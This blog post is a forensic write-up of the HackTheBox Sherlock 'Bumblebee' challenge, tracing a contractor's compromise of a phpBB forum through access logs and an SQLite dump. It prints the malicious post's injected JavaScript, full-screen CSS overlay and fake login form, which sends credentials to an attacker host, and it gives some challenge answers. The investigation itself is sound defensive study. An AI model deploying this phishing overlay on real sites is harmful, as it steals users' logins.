| title | seoTitle | seoDescription | datePublished | cuid | slug | cover | tags |
|---|---|---|---|---|---|---|---|
HTB Sherlock: Bumblebee |
HTB Sherlock: Bumblebee Write-up |
Grepping network logs and SQLite querying. Write-up for HackTheBox Sherlock challenge. |
Fri Mar 29 2024 08:00:28 GMT+0000 (Coordinated Universal Time) |
clucdix5v000c08l29x6ye8fg |
htb-sherlock-bumblebee |
sqlite, grep, ethical-hacking, htb, dfir, sqlite3 |
Name: Bumblebee
Category: DFIR
Difficulty: Easy (Solved)
An external contractor has accessed the internal forum here at Forela via the Guest WiFi and they appear to have stolen credentials for the administrative user! We have attached some logs from the forum and a full database dump in sqlite3 format to help you in your investigation.
%%[support-cta]
All evidence files are marked as readonly right after acquiring and their hash (sha256) is written down. Read-only attribute does not affect the hash of a file.
01: ZIP archive, password protected (hacktheblue)
$ bumblebee.zip
aa2f772a208f4bec24e99242b541b95302175a0960f326d107f5bfddbcf61775
02: gzip compressed data
$ bumblebee.zip/incident.tgz
58bf64aeabde58d057ef690c3f41aed48fdcafc3c81e3382df95c34ad1f51a24
03: POSIX tar archive
$ bumblebee.zip/incident.tgz/incident.tar
6822ffb99b274523f741d37236f018b0ef6b1b945d9a92d88ba9911d2ca26869
04: ASCII text
bumblebee.zip/.../access.log
43ca54b7fce36f772d8e0705625b2f54eaf91a3d32e71d342b1c4af7a16ce577
05: SQLite 3.x database
bumblebee.zip/.../phpbb.sqlite3
ec7579dbe5435f1972a44d462a8dd0b76db994be4eb5f68b5c3622164418940f
Customer provided the logs from web server (forum) and a database file (SQLite3). Name of the databse file and some requests in logs suggest that the forum was phpBB running on the PHP engine.
Consists only with GET/POST requests with few repetitions of OPTIONS:
::1 - - [25/Apr/2023:15:52:40 +0100] "OPTIONS * HTTP/1.0" 200 126 "-" "Apache/2.4.56 (Debian) (internal dummy connection)"
Shoting blindly with some potential RCEs
grep -iE "(sh|cmd|exec)" access.log | grep -ivE "(macintosh|sheet)
Checking for some unusual requests.
grep -E "(DELETE,PUT)" access.log
In this scenario we have 10 questions to answer.
- What was the username of the external contractor?
Grepping the logs for "username", "user", "login", "sign" returns nothing useful at the moment, so I'm looking into the database file.
$ sqlite -readonly phpbb.sqlite3
![](https://cdn.hashnode.com/res/hashnode/image/upload/v1710869146907/88c8f6d1-a4ba-43bd-bc08-9dca872de047.png align="center")
sqlite> .output db/phpbb_log.sql
sqlite> .dump phpbb_log
sqlite> .output db/phpbb_users.sql
sqlite> .dump phpbb_users
At database we can see two users with a mail domain '@contractor.net'. I have no idea which one is the contractor in question but nevertheless one of the usernames is the correct answer.
![](https://cdn.hashnode.com/res/hashnode/image/upload/v1710869164442/6657935b-b6bb-40f8-89ef-526ab037ffd3.png align="center")
- What IP address did the contractor use to create their account?
This can be found in phpbb_logs table, with action LOG_USERS_ADDED.
-
![](https://cdn.hashnode.com/res/hashnode/image/upload/v1710869193324/34844add-62ab-406b-8095-8254d1c9a704.png align="center")
What is the post_id of the malicious post that the contractor made?
Ah, so the contractor was the one who compromised the administrator account. I thougth that "they" meant owners of that Guest WiFi, but ok.
Grepping access.log for post_id returns nothing. Dumping php table:
sqlite> .output db/phpbb_posts.sql
sqlite> .dump phpbb_posts
Fortunatelly there are not really must post there. Malicious post with cookie stealing injection is there.
![](https://cdn.hashnode.com/res/hashnode/image/upload/v1710869220909/6017461a-1969-4846-956b-09ab2510e117.png align="center")
Injected form (pruned of unnecessary elements) is below.
<div>
//...
<script type="text/javascript">
function sethidden() {
const d = new Date()
d.setTime(d.getTime() + 24 * 60 * 60 * 1000)
let expires = 'expires=' + d.toUTCString()
document.cookie = 'phpbb_token=1;' + expires + ';'
var modal = document.getElementById('zbzbz1234')
modal.classList.add('hidden')
}
document.addEventListener('DOMContentLoaded', function (event) {
let cookieexists = false
let name = 'phpbb_token='
let cookies = decodeURIComponent(document.cookie)
let ca = cookies.split('; ')
for (let i = 0; i < ca.length; i++) {
let c = ca[i]
while (c.charAt(0) == ' ') {
c = c.substring(1)
}
if (c.indexOf(name) == 0) {
cookieexists = true
}
}
if (cookieexists) {
return
}
var modal = document.getElementById('zbzbz1234')
modal.classList.remove('hidden')
})
</script>
//...
<div class="modal hidden" id="zbzbz1234" onload="shouldshow">
<div id="wrap" class="wrap"> <a id="top" class="top-anchor" accesskey="t"></a>
<form action="http://10.10.0.78/update.php" method="post" id="login" data-focus="username"
target="hiddenframe">
<div class="panel">
<div class="inner">
<div class="content">
<h2 class="login-title">Login</h2>
<fieldset class="fields1">
<dl>
<dt><label for="username">Username:</label></dt>
<dd><input type="text" tabindex="1" name="username" id="username" size="25"
value="" class="inputbox autowidth"></dd>
</dl>
<dl>
<dt><label for="password">Password:</label></dt>
<dd><input type="password" tabindex="2" id="password" name="password" size="25"
class="inputbox autowidth" autocomplete="off"></dd>
</dl>
<dl>
<dd><label for="autologin"><input type="checkbox" name="autologin"
id="autologin" tabindex="4">Remember me</label></dd>
<dd><label for="viewonline"><input type="checkbox" name="viewonline"
id="viewonline" tabindex="5">Hide my online status this
session</label></dd>
</dl>
<dl>
<dt> </dt>
<dd> <input type="submit" name="login" tabindex="6" value="Login"
class="button1" onclick="sethidden()"></dd>
</dl>
</fieldset class="fields1">
</div>
</div>
</div>
</form>
</div>
</div>
</div>CSS styling used to "override" the browser content:
.modal {
position: fixed;
top: 0;
left: 0;
height: 100%;
width: 100%;
z-index: 101;
background-color: white;
opacity: 1;
}When someone enters credentials and tries to sing-in, username and password were redirected to the php script attacker controls:
<form action="http://10.10.0.78/update.php" method="post" ...
- What is the full URI that the credential stealer sends its data to?
Answer: http://10.10.0.78/update.php
-
When did the contractor log into the forum as the administrator? (UTC)
![](https://cdn.hashnode.com/res/hashnode/image/upload/v1710869268098/552f53e0-8ca9-4f45-be52-e8eea2981c6e.png align="center")
-
In the forum there are plaintext credentials for the LDAP connection, what is the password?
There is a plugin added to the phpBB that enabled LDAP connections, so let't try grepping config for the hope that LDAP connection details are stored there.
$ sqlite3 phpbb.sqlite3 ".dump phpbb_config" | grep -i ldap
![](https://cdn.hashnode.com/res/hashnode/image/upload/v1710869289556/c2063587-ea8f-4b69-b4b4-67ed49272254.png align="center")
- What is the user agent of the Administrator user?
User agents are listed in the access.log
![](https://cdn.hashnode.com/res/hashnode/image/upload/v1710869303419/2bf08a30-0ca1-4406-8f01-ff681f685981.png align="center")
- What time did the contractor add themselves to the Administrator group? (UTC)
Returning to the phpbb_logs table.
![](https://cdn.hashnode.com/res/hashnode/image/upload/v1710869318978/a1ff8ed4-084e-4a87-ba41-37405299e3fa.png align="center")
date -u -d @1682506431 "+%d/%m/%Y %H:%M:%S"
- What time did the contractor download the database backup? (UTC)
Again, access.log
$ grep -iE "(.sql.)" access.log
![](https://cdn.hashnode.com/res/hashnode/image/upload/v1710869333722/3429390c-1fd0-4feb-bdb9-4d1e01f98e7c.png align="center")
- What was the size in bytes of the database backup as stated by access.log?
Size is in the same line as previous answer.
Answer: 34707
None required.
-
Grepping
sqlite3outputs (sqlite3 [dbfile] ".dump ..." | grep ...) -
Converting Unix timestamp to UTC (
date -u -d @1682506431 "+%d/%m/%Y %H:%M:%S")
%%[follow-cta]